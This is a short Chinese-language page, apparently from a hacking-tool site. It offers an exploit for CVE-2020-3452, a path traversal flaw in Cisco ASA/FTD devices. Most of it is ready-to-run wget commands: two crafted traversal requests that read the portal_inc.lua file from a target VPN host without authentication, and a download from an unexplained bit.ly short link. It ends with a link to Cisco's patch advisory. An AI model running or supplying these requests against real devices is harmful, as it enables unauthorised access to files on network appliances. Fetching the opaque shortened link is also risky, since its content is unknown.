黑客、渗透测试和网络安全工具,武装您的安全武器库!
CVE-2020-3452的利用脚本,针对Cisco ASA/FTD设备的路径遍历漏洞,可通过精心构造的HTTP请求实现未授权文件读取。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
#CVE-2020-3452 #CVSS 7.5(基准)
wget https://bit.ly/32Q065t
wget https://vpn.target.local:443/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
wget https://vpn.target.local:443/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
#来自CISCO的补丁 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86